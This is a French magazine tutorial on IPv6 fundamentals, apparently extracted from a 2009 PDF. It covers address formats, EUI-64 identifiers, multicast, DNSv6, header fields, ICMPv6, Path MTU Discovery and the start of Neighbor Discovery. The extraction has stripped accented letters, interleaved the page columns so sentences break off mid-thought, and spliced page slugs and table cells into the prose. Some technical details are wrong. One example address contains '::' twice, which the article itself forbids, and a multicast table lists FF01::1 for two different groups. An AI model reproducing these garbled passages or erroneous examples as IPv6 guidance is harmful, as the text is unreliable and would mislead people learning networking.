Le nouveau mode dadressage. Les mcanismes de communication sous-jacents. La configuration automatique. Les diffrences entre 2 protocoles : Ipv4 et Ipv6.

Format des adresses

Les adresses IPv6 sont constitues de 16 octets (128 bits). On dispose ainsi d'environ 3,4 1038 adresses, soit plus de 667 millions de milliards d'adresses par millimtre carr de surface terrestre. Elles sont dcoupes en 8 mots de 16 bits (4 chiffres hexadcimaux) spars par des :. En comparaison les adresses IPv4 sont constitues de 4 octets, chaque octet tant not par sa forme dcimale; les diffrents octets tant spars par des .. Exemple : fe80:0000:0000:0000:0240:96ff: fea7:00d3 est une adresse IPv6

CE QU'IL FAUT SAVOIR...

Afin dapprhender au mieux cet article, il est prfrable davoir des connaissances relativement solides dIPv4 et en particulier du modle en couche TCP/IP.. 14 HAKIN9 2/2009

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 14

2009-01-05, 18:03

TECHNIQUES FONDAMENTALES DIPV6

Cette notation pouvant tre fastidieuse, les mthodes de simplification suivantes ont t dfinies : La notation :: permet de reprsenter plusieurs 0 conscutifs au sein de plusieurs mots de 16 bits. Le nombre de 0 peut tre retrouv en examinant le nombre de mots prsents dans ladresse. Cet lment ne peut tre prsent quune fois au sein de ladresse, Au sein dun mot de 16 bits les chiffres hexadcimaux de poids fort positionns 0 peuvent tre omis. les adresses Anycast sont destines la communication avec une seule interface dun groupe donn. sera lune ou lautre selon la porte de la communication. Le concept principal dIPv6 est la communication de bout en bout. Le NAT/PAT (Network Address Translation/Protocol Address Translation) na plus sa place en IPv6. En effet, le NAT bien que considr comme un moyen de protection et masquage des rseaux posait de srieux problmes sur cette communication de bout en bout. Un certain nombre dartifices sont ainsi gnralement utiliss pour pallier la modification des adresses IPv4 et des ports TCP/UDP (et identifiants ICMP) au niveau des routeurs de bordures. Il est ainsi parfois ncessaire de disposer en sus dALGs (Application Level Gateway) ou passerelles applicatives pour modifier le contenu des charges utiles des paquets lorsque cellesci contiennent des informations relatives aux adresses prives. Cest le cas du protocole FTP (File Transfert Protocol) par exemple, dans lequel les changes initiaux de contrle indiquent au niveau de la charge utile ladresse ainsi que le port de la session de donne.

Ces notions seront explicites par la suite.

Adressage Unicast
Les adresses Unicast sont destines la communication avec une interface unique. Ces adresses sont de deux types selon leur porte. Les adresses Lien-local : destines la communication au sein dun lien, Les adresses globales : ayant une porte mondiale et destines aux changes de lInternet IPv6.

La mthode de simplification 1 sur lexemple prcdent nous donne fe80:: 0240:96ff:fea7:00d3. En appliquant la mthode 2 on obtient ladresse fe80::240:96ff:fea7::d3, qui est beaucoup plus lisible. En IPv6 on abandonne le format classique de masque usit en IPv4 pour dcrire un rseau ou un sous-rseau par le nombre de bits pertinents aprs le symbole /. Exemple : 2a01:e35:2EC0:B6A0::/64 dcrit un rseau IPv6 compos des 64 premiers bits, FE80::/64 dcrit galement en format simplifi un rseau IPv6 de 64 bits. Il sagit en fait de FE80:0000::/64.

Similairement IPv4, on retrouve en plus une adresse de loopback ainsi quune adresse indtermine. La notion dadressage public/priv utilis en IPv4 est revisite en IPv6. Chaque interface possde une adresse Lien-local ainsi que potentiellement une ou plusieurs adresses globales. Ladresse utilise Tableau 1. Code Fabricant (OUI) sur 3 octets

Code Fabricant (OUI) sur 3 octets en hexadcimal 00 00 0C 00 03 93 02 80 8C 08 00 20 08 00 5A Tableau 2. Porte des adresses Multicast Valeur 1 2 4 5 0, 3, F 6, 7, A, B, C, D Porte Interface-local Lien-local Admin-local Site-local (actuellement dprci) Rserv Non assign

Vendeur/Fabricant Cisco Apple 3COM SUN IBM

Gnralement, les 64 premiers bits de l'adresse IPv6 servent l'adresse de sous-rseau, tandis que les 64 bits suivants identifient l'hte l'intrieur du sous-rseau.

Les diffrents types dadresses

IPv6 dfinit 3 types dadresses les adresse Unicast, Multicast et Anycast. Voici leur description : les adresses Unicast sont destines : destines la communication avec une interface unique, les adresses Multicast sont destines la communication avec un groupe dinterfaces. La notion de broadcast utilise en IPv4 pour joindre lensemble des interfaces dun lien nexiste plus en IPv6 mais est remplace par ce type dadresse beaucoup plus fin,

Tableau 3. Quelques Groupes Multicast prdfinis Prfixe FF01::1 FF02::1 FF01::1 FF02::2 FF02::9 Groupe Tous les nuds de linterface Tous les nuds du lien Tous les routeurs de linterface Tous les routeurs du lien Tous les routeurs RIPng
2/2009 HAKIN9 15

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 15

2009-01-05, 18:03

DOSSIER
La limitation majeure concerne la scurisation des changes de bout en bout. Un chiffrement ou une authentification utilisant ladresse de lmetteur devient ainsi invalide ds lors que ladresse de celui-ci est modifie par le routeur de bordure. Contrairement aux ides reues le NAT/PAT nest pas une scurit fiable et peut donc facilement tre abandonn au profit de mcanisme de scurisation de bout en bout. LE NAT/PAT est simplement un artifice pour palier la pnurie dadresses IPv4. interface sur un lien. Il est donc requis que ces identifiants dinterface soient uniques au sein dun prfixe rseau. Celles-ci sont formes depuis un identifiant EUI-64 (cf. Figure 1) par inversion dun bit particulier not u (universal/local bit). Les cartes Ethernet, elles, possdent un identifiant de la forme MAC-48 (cf. Figure 2) et sont exprimes sous la forme de 12 chiffres hexadcimaux : les 3 premiers octets nots OUI (Organizationally Unique Identifiers) sont administrs par lIEEE et identifient le constructeur, les 3 suivants sont la charge du constructeur et forment le numro de srie de la carte. :/64 lidentifiant dinterface au format EUI-64 modifi. La Figure 4 prsente un tel type dadresse.Lunicit au niveau lien de lidentifiant dinterface assure ainsi lunicit de ladresse IPv6 Lien-local. Ce type dadresse ne traverse jamais les routeurs.

Adresses Globales
Les adresses Globales sont formes de manire similaire aux adresses Lien-local par concatnation du prfixe rseau lidentifiant dinterface au format EUI-64 Modifi. Lunicit au niveau du prfixe de lidentifiant dinterface assurera galement lunicit mondiale de ladresse IPv6, les prfixes rseaux tant dlivrs par des fournisseurs de service ou directement des autorits de rgulation. La nomenclature dune telle adresse a t clairement dfinie afin de permettre des attributions hirarchiques de prfixes jusquaux sites finaux. Ce type dadresse est utilis pour une communication gnralement en dehors dun rseau local ou LAN (Local Area Network) voir lchelle de lInternet Ipv6. Ladresse de loopback (127.0.0.1 en IPv4) est utilise pour reprsenter le nud lui-mme. Elle ne transite jamais sur le rseau. Elle est note ::1. L'adresse indtemine est utilise par exemple lorsque linterface na pas encore connaissance de son adresse (0.0.0.0 en IPv4). Elle est note ::.

Identifiant EUI-64
Les adresses MAC (Media Access Control) sont des identifiants physiques stocks dans les cartes ou les interfaces rseaux afin de permettre un adressage mondial pratiquement unique. Cette assertion nest cependant pas garantie, la plupart des drivers permettent maintenant de la modifier manuellement. Les espaces de nommage suivants, grs par lIEEE (Institute of Electrical and Electronics Engineers) sont couramment utiliss afin dadresser ces diffrentes interfaces : EUI-64 sur 64 bits, MAC-48 sur 48 bits.

Le tableau 1 vous prsente ainsi quelques numros OUI attribus par lIANA. Chaque carte rseau vendue par Cisco commence donc par le prfixe 00-00-0C. Un identifiant EUI-64 modifi est form depuis cette adresse MAC par inversion du bit u (universal/local bit) et insertion de la valeur hexadcimale sur deux octets FFFE entre le numro constructeur et le numro dinterface (cf. Figure 3). Exemple : Ladresse Mac 00-40-96-A7C5-D3 donne ainsi lidentifiant dinterface 02-40-96-FF-FE-A7-C5-D3

Les adresses unicast IPv6 utilisent intensivement une version modifie de lEUI-64 (Extended Unique Identifier sur 64 bits) afin de permettre lidentification dune Tableau 4. Champs de lentte IPv6 Champs Version Traffic Class Flow Label Payload Length Taille 4 bits 8 bits 20 bits 16 bits Rle

Adresses Lien-local
Au niveau dun lien, les adresses IPv6 sont formes par concatnation du prfixe FE80:

Adressage Multicast
En IPv4, on dispose de la notion de broadcast afin de permettre la diffusion

Dcrit la version du protocole. Vaut 6 pour IPv6. Destin pour faire de la QoS par priorisation, shaping de trafic ayant pour but doffrir des fonctions de qualit de service comme Diffserv. Incompltement spcifi actuellement. Numro unique choisi par la source, ayant pour but doffrir des fonctions de qualit de service comme RSVP. Longueur en octet de la charge utile du paquet. En prsence dextension dentte, ceux-ci sont comptabiliss par ce champ. En IPv4, un champ similaire Total Length comptabilise en plus lentte ce qui finalement est inutile et limite la taille totale de la charge utile du paquet. Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Similaire au champ Protocol en IPv4. Dcrment par chaque routeur prsent le long du chemin. Le paquet est jet si ce champ devient nul permettant ainsi dviter que le paquet boucle indfiniment dans le rseau. Similaire au champ TTL en IPv4. Contient une adresse unicast de lmetteur du paquet. Contient ladresse du ou des destinataires du paquet.

Next Header Hop Limit

8 bits 8 bits

Source Address Destination Address

16 HAKIN9 2/2009

128 bits 128 bits

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 16

2009-01-05, 18:03

TECHNIQUES FONDAMENTALES DIPV6

de paquets lensemble des interfaces prsentes sur un lien. IPv6 raffine cette notion et lui oppose le concept de multicast pour reprsenter un groupe dinterfaces potentiellement de porte mondiale. Les adresses multicast (cf. Figure 5) utilisent le prfixe FF00::/8. Le champ Flag est compos de 4 bits. Les 3 premiers sont rservs et gnralement positionns 0, le dernier reprsente la dure de validit de ladresse et est positionn 1 si ladresse est permanente, le cas chant il est positionn 0. Le champ Scope indique la porte de ladresse selon le Tableau 2. Les adresses multicast se drivent encore en 2 groupes : Adresses multicast prdfinies : leur champ Flag vaut 0 et elles sont gnralement dfinies par une autorit telle que lIANA (Internet Assigned Numbers Authority) charge de la gestion de l'espace d'adressage IP ainsi que dautres ressources partages de numrotation requises soit par les protocoles de communication, soit pour l'interconnexion de rseaux lInternet. Le Tableau 3 donne pour exemple certains groupes importants rgis par lIANA. Adresses Multicast sollicites : ce type dadresse est une fonction des adresses anycast/unicast. Pour chaque adresse unicast ou anycast configure, une interface coute sur une adresse multicast de ce type. Ce type dadresse est form par combinaison du prfixe FF02 :0 :0 :0 : 0 :1 :FF00/104 avec les 24 derniers bits de ladresse unicast/anycast. Nous verrons par la suite que ce type dadresse permet de limiter la diffusion pour le protocole de Neighbor Discovery (dcouverte des voisins) et en particulier le DAD (Dtection Dadresse Duplique) contrairement au protocole ARP (Address Resolution Protocol) dIPv4. Pour exemple ladresse IPv6 4037::01:800:200E:8C6C donne ladresse sollicite FF02::1:FF0E:8C6C. Tableau 5. Valeurs principales du champ Next Header Protocoles TCP UDP IPv6 ICMPv6 No Next Header Encapsulation IP Valeur 6 17 41 58 59 94

Adressage Anycast
Une adresse anycast permet de reprsenter un service plutt quune interface donne. On veut ainsi pouvoir joindre une machine fournissant certains services sans se soucier de la machine contacte. Elle est trs peu utilise pour linstant et pose naturellement des problmes de scurit.

Tableau 6. Valeurs principales du champ Next Header pour les extensions dentte Protocoles Hop-by-Hop Options Header Fragment Header Destination Options Header Authentication Header Encapsulating Security Payload Valeur 0 44 60 51 50

DNSv6
On rappelle que le DNS (Domain Name System) permet lobtention dun nom plus lisible partir dune adresse et inversement partir du moment o ce nom a t enregistr dans une hirarchie de serveur DNS. Le format des adresses IPv6 tant naturellement plus long, la question dune mise jour du DNS tait vidente. En IPv4, la transformation nom DNS vers adresse IP est dfinie par un enregistrement nomm A . En IPv6, la taille des adresses tant 4 fois plus importante le quadrupl AAAA est utilis. La capture prsente en Figure 6 montre ainsi une requte DNSv6 sous Windows XP en utilisant la commande nslookup. On remarquera en particulier que le serveur DNS est adress en IPv4 bien que lon fasse une requte IPv6. Il en va de mme pour un serveur IPv6, celui-ci peut trs bien rpondre des requtes pour des adresses IPv4. Si lon avait ici effectu une requte pour obtenir toutes les adresses de www.kame.net, on aurait obtenu lensemble de ses adresses IPv4 et IPv6. La transformation inverse depuis ladresse vers le nom est similaire en IPv4 et IPv6 et utilise un enregistrement PTR (Seul larbre DNS inverse est diffrent : in.addr.arpa pour ipv4 et ip6.arpa pour IPv6). Il a prcdemment t indiqu quune adresse IPv6 tait forme par combinaison dun prfixe et dun identifiant dinterface

dpendant de son adresse de niveau liaison de donne. On comprend donc quun changement dinterface impacte potentiellement ladresse IPv6 de linterface et de l mme les enregistrements DNSv6. Ce souci a amen des rflexions sur la mise jour scurise de ces diffrents enregistrements au travers dun protocole baptis DNSsec (Domain Name System Security Extensions). Ce protocole ne scurise pas uniquement les changes mais protge galement les donnes ainsi que les enregistrements DNS de bout en bout par une hirarchie de cls. Chaque domaine signant son sous-domaine Malheureusement lheure actuelle ce protocole est trs peu usit. Seuls quelques domaines sont ainsi scuriss. Le RIPE-NCC (responsable du domaine in-addr.arpa) par exemple signe ainsi ses enregistrements avec DNSsec.

Entte IPv6

Lentte IPv6 a t soigneusement pens afin de supprimer les incohrences et problmes rencontrs en IPv4.

Tableau 7. Champ de lextension dentte Hop-By-Hop Option Header Champs Next Header Hdr Ext Len Options Taille 8 bits 8 bits Variable Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Longueur de lentte en mot de 8 bits sans prendre en compte les 8 premiers bits. Contient une ou plusieurs sous-options adquates au protocole usit. La taille de ce champ est telle que lextension dentte soit un multiple de 8 octets.
2/2009 HAKIN9 17

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 17

2009-01-05, 18:03

DOSSIER
Le checksum ou somme de contrle calcul sur lentte nest plus prsent. On considre les rseaux suffisamment fiables pour ne pas avoir besoin de vrifier ce champ dautant plus que dans le cas dIPv4 celui-ci est vrifi et recalcul par chaque routeur prsent le long du chemin. En effet ce checksum inclus le champ TTL (Time To Live) dcrment par chaque routeur lors du transfert du paquet. Ce champ TTL est destin viter quun paquet boucle indfiniment dans le rseau. Ainsi les routeurs rencontrant un paquet avec un champ TTL 0 se doivent de le jeter. Les protocoles de niveau suprieur (niveau transport) auront la charge de vrifier lintgrit des paquets, Les champs relatifs la fragmentation ont t supprims de lentte. En IPv6, es paquets ne sont plus fragments le long du chemin mais sont fragments par la source. La source se doit donc de connatre le Path MTU (Maximum Transmission Unit) ou taille maximum des informations pouvant transiter le long du chemin. Un protocole ddi baptis Path MTU Discovery a donc t soigneusement dfini dans cette optique. Afin de faciliter ce protocole un MTU minimum de 1280 octets est exig sur les diffrents liens utilisant IPv6, Les options et en particulier leur alignement taient assez mal grs en IPv4 rendant ainsi difficile une gestion hardware de celles-ci. Ces problmes ont t corrigs en IPv6. Elles sont maintenant baptises extensions header et sont chanes entre elles de manire plus cohrente. Bien entendu les adresses IPv6 tant 4 fois plus grandes, lentte IPv6 est galement plus grand. Il fait 40 octets pour lentte minimal alors que lentte IPv4 nen fait que 20. On constatera nanmoins que les 2 adresses IPv6 de lentte reprsentent dj 32 octets alors que les 2 adresses IPv4 nen font que 8 (i.e. 24 octets de plus). La Figure 7 vous prsente lentte IPv6 minimal ainsi que lentte IPv4 pour comparaison. La signification des diffrents champs de lentte IPv6 est prcis dans le Tableau 4. routeurs prdfinis lors de lacheminement du paquet. Cet entte contenait ainsi une liste dadresses traverser et lorsque la premire cible indique dans ladresse de destination du paquet tait atteinte, celle-ci changeait son adresse avec la premire adresse de la liste et ainsi de suite jusquau dernier lment de la liste. Le nombre dadresses prsentes pouvant tre relativement important au sein de cette liste, cette option pouvait tre plus facilement utilise en IPv6 pour effectuer des attaques par dni de service en crant des boucles dans ces listes. Cette extension dentte a donc t dprcie. Le Tableau 6 prsente les valeurs utilises dans les champs Next Header prcdent afin de permettre le chanage de ces diffrentes extensions dentte. Ces extensions dentte ont parfois des contraintes dalignement. Dans ces cas-l des sous-options de bourrage sont utilises. La Figure 8 prsente les extensions dentte qui seront explicites par la suite.

Chanage des enttes et extensions dentte

Les diffrents enttes de niveau suprieur ainsi que les options IPv6 sont chans entre eux par lutilisation dun champ Next Header. Le Tableau 5 prsente quelques-unes des valeurs de ce champ Next Header dfinies par lIANA . Le nombre doptions minimales et obligatoires implmentes sur les piles IPv6 est moins important quen IPv4. On distingue les extensions denttes suivants : Hop-by-Hop Options Header, Fragment Header, Destination Options Header, Authentication Header (AH), Encapsulating Security Payload (ESP).

Hop-By-Hop Option Header

Cette extension dentte est analyse par lensemble des routeurs prsent le long du chemin. Le rle des diffrents champs est prcis dans le Tableau 7. On pourra se reporter la Figure 8 pour le format de lentte.

Historiquement IPv6 incluait galement un entte baptis Routing Header de type 0, similaire loption Loose Source Routing en IPv4. Cette option permet de traverser des

Fragment Header
Cette extension dentte est utilise pour transfrer un fragment de paquet, le

Tableau 8. Champ de lextension dentte Fragment Header Champs Next Header Reserved Fragment Offset Res M Identification Taille 8 bits 8 bits 13 bits 2 bits 1 bit 32 bits Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Rserv pour une utilisation future. Offset en unit de 8 octets relativement au dbut de la partie fragmentable du paquet originel. Rserv. Positionn 1 sil y a dautres fragments ultrieurs, 0 sinon. Identificateur commun lensemble des fragments.

Tableau 9. Champ de lextension dentte Destination Option Header Champs Next Header Hdr Ext Len Options Taille 8 bits 8 bits Variable Rle Dcrit lentte de la couche immdiatement suprieure ou la prochaine extension dentte. Longueur de lentte en mot de 8 bits sans prendre en compte les 8 premiers bits. Contient une ou plusieurs sous-options adquates au protocole usit. La taille de ce champ est telle que lextension dentte soit un multiple de 8 octets.

18

HAKIN9 2/2009

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 18

2009-01-05, 18:03

TECHNIQUES FONDAMENTALES DIPV6

paquet originel tant suprieur au Path MTU (MTU minimum entre la source et la destination). En IPv6 la fragmentation est effectue de bout en bout et non plus dans le cur de rseau comme en IPv4. Ceci sera reprcis par la suite avec la notion de Path MTU Discovery. Grossirement lmetteur fragmente le paquet originel en petits fragments de taille infrieure ou gale au Path MTU. Ces fragments seront rassembls par la destination avant transmission la couche de niveau transport. Le rle des diffrents champs est prcis dans le Tableau 8. On pourra se reporter la Figure 8 pour le format de lentte. complmentaires uniquement analyses par la destination. Le rle des diffrents champs est prcis dans le Tableau 9. On pourra se reporter la Figure 8 pour le format de lentte. pas de checksum et que les adresses sont plus grandes, quelques modifications sont prendre en considration. En IPv4, UDP na pas pour obligation de remplir son champ checksum. Avec IPv6, ce calcul devient obligatoire pour UDP tant donn que lentte IPv6 ninclut pas de champ checksum, Les calculs de checksum, aussi bien en IPv4 quen IPv6 pour UDP et TCP seffectuent sur lentte UDP ou TCP suivi de la charge utile du protocole de niveau transport et prcd dun pseudo-header incluant entre autre les adresses source et destination IP. Ce pseudo-Header tant lgrement diffrent entre les deux versions, les adresses tant de tailles diffrentes, le calcul du checksum est lui aussi lgrement modifi. Sans rentrer dans les dtails le calcul est le complment 1 sur 16 bits de la somme des complments 1 de tous les mots de 16 bits prsents dans cette concatnation denttes.

Authentication Header & Encapsulating Security Payload

Ces extensions dentte sont utilises par le protocole IPsec, charg de la scurit du paquet. Ces extensions ainsi que le protocole IPsec seront dcrits ultrieurement.

Protocoles de niveau Transport pour IPv6 : TCP & UDP

Les protocoles de niveau transport sont lgrement impacts par cette nouvelle version du protocole. Leurs comportements ainsi que leur enttes restent lidentique mais tant donn que lentte IPv6 ninclut

Destination Option Header

Cette extension dentte est utilise pour transfrer des informations Tableau 10. Champ de lentte ICMPv6 Champs Type Code Checksum Content Taille 8 bits 8 bits 16 bits Variable Rle

Indique le type de message ICMPv6. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Spcifique au type de message ICMPv6 usit.

La Figure 9 prsente le pseudo-Header utilis en IPv4 ainsi quen IPv6.

ICMPv6

Tableau 11. Champ Type des messages derreur ICMPv6 Messages derreurs Destination Unreachable Packet too Big Time Exceeded Parameter Problem Valeur du champ Type 1 2 3 4

Tableau 12. Champs de lentte ICMPv6 Destination Unreachable Champs Type Code Taille 8 bits 8 bits Rle Vaut 1. Prcise la cause de rejet du paquet : 0 : Pas de route pour la destination, 1 : Interdiction administrative, 2 : Porte de la destination en inadquation avec la source, 3 : Adresse non joignable, 4 : Port non joignable, 5 : Rejet suite la politique ingress/egress de ladresse source, 6 : Rejet suite une politique de route vers la destination. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0.

ICMPv6 (Internet Control Message Protocol) est un protocole de niveau 3 sur le modle en couche TCP/IP, qui permet le contrle des erreurs de transmission. En effet, comme le protocole IPv6 ne gre que le transport des paquets et ne permet pas l'envoi de messages d'erreur, c'est grce ce protocole qu'une machine mettrice peut savoir qu'il y a eu un incident de rseau. ICMPv6 est plus que le pendant dICMP pour IPv4, dans la mesure o il reprend ses spcificits et y ajoute dautres autrefois subdivises dans divers protocoles indpendants. On distingue en particulier : la rsolution dadresse, la dtection dadresse double intgrs auparavant dans ARP (Address Resolution Protocol) pour IPv4. Ces nouveauts seront par la suite dcrites au sein du protocole baptis Neighbor Discovery, la gestion de groupes multicast dfinie auparavant dans IGMP (Internet Group Management Protocol) pour IPv4. Ce mcanisme est prsent nomm MLD (Multicast Listener Discovery),
2/2009 HAKIN9 19

Checksum Unused Content

16 bits 32 bits

Variable Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6.

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 19

2009-01-05, 18:03

DOSSIER
La dcouverte du Path MTU, par le mcanisme Path MTU Discovery. Ces diffrents messages se classifient en 2 catgories : Messages derreur : nots de 0 127 inclus, Messages informationnels : nots de 128 255 inclus. informer lmetteur. La charge utile de ce message contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6 (i.e. 1280 octets). Le rle des diffrents champs est prcis dans le Tableau 13. On pourra se reporter la Figure 11 pour le format de lentte. Le rle des diffrents champs est prcis dans le tableau 14. On pourra se reporter la Figure 11 pour le format de lentte.

Parameter Problem
Ce type de message est gnr par un routeur ne pouvant parser un paquet IPv6 suite une erreur rencontre dans lentte ou dans les enttes dextension. Le rle des diffrents champs est prcis dans le Tableau 15. On pourra se reporter la Figure 11 pour le format de lentte.

Entte ICMPv6

Time Exceeded
Ce type de message est gnr par un routeur lorsque le champ Hop Limit du paquet IPv6 transmettre atteint ou est gal 0. Les paquets IPv6 prsentant une telle spcificit sont jets. Cest en particulier ce type de message qui permet de connatre la route utilise entre 2 points de communication par la commande classique traceroute6. Dans un cadre dutilisation classique de cette commande, lmetteur transmet des paquets IPv6 vers la destination en incrmentant le champ Hop Limit partir de la valeur 1. Le premier routeur recevra donc un tel paquet avec un champ Hop Limit 1, dcrmentera ce champ 0 et gnrera un paquet Time Exceeded vers la source ; le second routeur recevra galement un paquet avec un champ Hop Limit 1, dcrmentera ce champ 0 et gnrera un paquet Time Exceeded vers la source et ainsi de suite jusqu la destination finale.

Lentte commun lensemble des messages ICMPv6 est prsent en Figure 10. Le rle des champs gnriques principaux est indiqu dans le Tableau 10.

Messages informationnels
Les messages dinformation ICMPv6 principaux sont indiqus dans le Tableau 16. Dans ce paragraphe, seuls seront prciss les messages caractre informatif. Ceux relatifs au Neighbor Discovery seront explicits dans le paragraphe associ.

Messages derreurs
Les messages derreurs ICMPv6 sont similaires ceux utiliss en ICMPv4. Ceuxci sont indiqus dans le Tableau 11. Les enttes de ces diffrents messages derreurs sont relativement proches et sont dcrites par la Figure 11.

Echo Request / Echo Reply

Ces paquets sont utiliss comme sonde pour dtecter si une machine est joignable ou non. Lorsque un paquet ICMPv6 Echo Request est transmis une interface celle-ci doit rpondre la machine mettrice par un paquet ICMPv6 Echo Reply en utilisant un adressage source de mme porte. Ce type de message est principalement utilis par la commande classique ping6.

Destination Unreachable
Un routeur ne pouvant transfrer un paquet pour une quelconque raison telle que par exemple par manque de connaissance sur la route emprunter, par cause doutrepassement de la politique de scurit devrait gnrer un tel message lentit mettrice avant de rejeter le paquet. La charge utile de ce message contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6 (i.e. 1280 octets). En cas de rejet par cause de congestion un routeur ne doit jamais gnrer un tel paquet, il ne ferait quaccentuer la congestion. De la mme manire une entit destinatrice peut gnrer un tel paquet si le protocole de niveau transport ne dispose pas par exemple de serveur en coute sur le port que lmetteur cherche joindre. Le rle des diffrents champs est prcis dans le tableau 12. On pourra se reporter la Figure 11 pour le format de lentte.

Tableau 13. Champs de lentte ICMPv6 Packet Too Big Champs Type Code Checksum MTU Content Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 2. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Indique le MTU limitatif. Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6

Tableau 14. Champs de lentte ICMPv6 Time Exceeded Champs Type Code Checksum Unused Content Taille 8 bits 8 bits 16 bits 32 bits Variable Rle Vaut 3. Positionn 0. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Positionn 0. contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum IPv6

Packet Too Big

Ce type de message est particulirement intressant pour la dtection du MTU minimum prsent le long du chemin (Cf. Path MTU Discovery). Un routeur devant transfrer un message sur un lien ne pouvant le contenir utilise ce type de message en prcisant la taille du MTU limitatif pour en
20 HAKIN9 2/2009

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 20

2009-01-05, 18:03

TECHNIQUES FONDAMENTALES DIPV6

Le rle des diffrents champs est prcis dans le Tableau 17, le format de lentte est indiqu dans la Figure 12. simple baptis Path MTU Discovery. Celui-ci repose principalement sur les paquets ICMPv6 Packet Too Big. Un routeur devant transmettre un paquet dune taille suprieure au lien doit rejeter ce paquet et envoyer un paquet ICMPv6 Packet Too Big lmetteur en lui indiquant le MTU du lien concern. Lmetteur aura alors charge de fragmenter le paquet en utilisant les extensions dentte Fragment Header et de rexpdier ces fragments qui pourront par la suite ventuellement poser problme pour un autre routeur. Exemple : dans lexemple de la Figure 13, H1 souhaite transfrer 1460 octets de donnes vers R2. Avec les 40 octets dentte IPv6, H1 gnre un paquet de 1500 octets et le transmet R1. Or le MTU entre R1 et R2 est de 1280 octets (MTU minimum pour IPv6) ; R1 transmet donc un paquet ICMPv6 Packet Too Big H1 en lui indiquant ce MTU de 1280 octets ; charge sera alors H1 de fragmenter ce paquet et dmettre nouveau ces fragments. La composition des fragments peut donc tre de 1232 octets de donnes (+40 octets dentte IPv6 +8 octets dentte de fragmentation) pour le 1er fragment et 128 octets de donnes (+40 octets dentte IPv6 +8 octets dentte de fragmentation) pour le 2me fragment. Au cours du temps ce Path MTU peut bien entendu augmenter nouveau, parce que la route est modifie, un tunnel est supprim, une interface change Dans un souci dun meilleur remplissage des paquets, la source enverra de temps en temps des paquets dune taille suprieure au Path MTU dtect afin de tester une ventuelle augmentation de celui-ci.

Fragmentation & Path MTU Discovery

On rappelle auparavant que le MTU (Maximum Transmission Unit) est la quantit dinformation maximum pouvant traverser un lien. Le Path MTU est ainsi le MTU minimum du chemin entre la source et la destination. Il a auparavant t prcis quen IPv6 le concept de fragmentation est compltement diffrent tant donn que le cur de rseau na plus cette tche. Si besoin est de transmettre des paquets de taille suprieure au Path MTU, la fragmentation est ralise par linitiateur des paquets. Afin de limiter les problmes de transmission de paquets, IPv6 impose un MTU minimum de 1280 octets. Toutefois cette dfinition du minimum nimpose en aucune faon que les paquets transmis fassent au plus 1280 octets. La dcouverte du Path MTU peut seffectuer laide dun protocole trs

Neighbor Discovery Protocol (Dcouverte des voisins)

Le protocole de Neighbor Discovery est un protocole indissociable dIPv6. Il a t conu pour faire dIPv6 un protocole plug-and-play. Lide sous-jacente du Neighbor Discovery est de supprimer toute configuration rseau manuelle des interfaces. Il suffit de connecter linterface sur un rseau, pour quautomatiquement, les adresses, la route par dfaut, le MTU soient initialiss. Bien videmment, il ne sagit ici que des machines nayant pas le rle de routeur.

Tableau 15. Champs de lentte ICMPv6 Parameter Problem Champs Type Code Taille 8 bits 8 bits Rle Vaut 4. Prcise la cause du problme rencontr : 0 : Erreur dans un champ de lentte, 1 : Erreur dans le champ Next Header, 2 : Erreur dans une extension dentte. Somme de contrle afin de dtecter des erreurs ventuelles de transmission. Pointeur sur loctet responsable de lerreur. Contient une partie du paquet responsable de telle manire que la taille totale du paquet ICMPv6 ne dpasse pas le MTU minimum Ipv6.

Checksum Pointer Content

16 bits 32 bits Variable

Tableau 16. Champ Type des messages informationnels ICMPv6 Messages Informationnels Echo Request Echo Reply Group Membership Query Group Membership Report Group Membership Reduction Router Solicitation Router Advertisement Neighbor Solicitation Neighbor Advertisement Redirect Valeur du champ Type 128 129 130 131 132 133 134 135 136 137
2/2009 HAKIN9 21

Caractre du message Informatif Gestion des groupes Multicast (MLD)

Neighbor Discovery

14_15_16_17_18_19_20_21_22_23_24_25_26_27_iPV6-11.indd 21

2009-01-05, 18:04

DOSSIER
Ce protocole regroupe les fonctionnalits suivantes : dcouverte des routeurs prsents sur le lien, dcouverte des prfixes du lien, dcouvertes de certains paramtres du lien : MTU , configuration automatique sans tat des adresses Lien-local et globale, rsolution dadresse, dcouverte des routes par dfaut ainsi que des prochains routeurs pour une destination donne, Neighbor Unreachability Detection (NUD) : permet de dterminer quune entit du lien nest plus joignable, Duplicate Address Detection (DAD) : dtection dadresse duplique, mcanisme de redirection. comprenant par exemple un routeur disposant dune connexion point point avec toutes les interfaces prsentes.

Enttes de messages du Protocole Neighbor Discovery

Le Neighbor Discovery sappuie essentiellement sur la couche ICMPv6 et dfinit pour cette couche 5 messages : 2 pour la communication entre une interface et un routeur, 2 pour le dialogue entre voisins et 1 pour la redirection (celle-ci souvent non autorise sera laisse de ct).

Sollicitation et annonces des routeurs

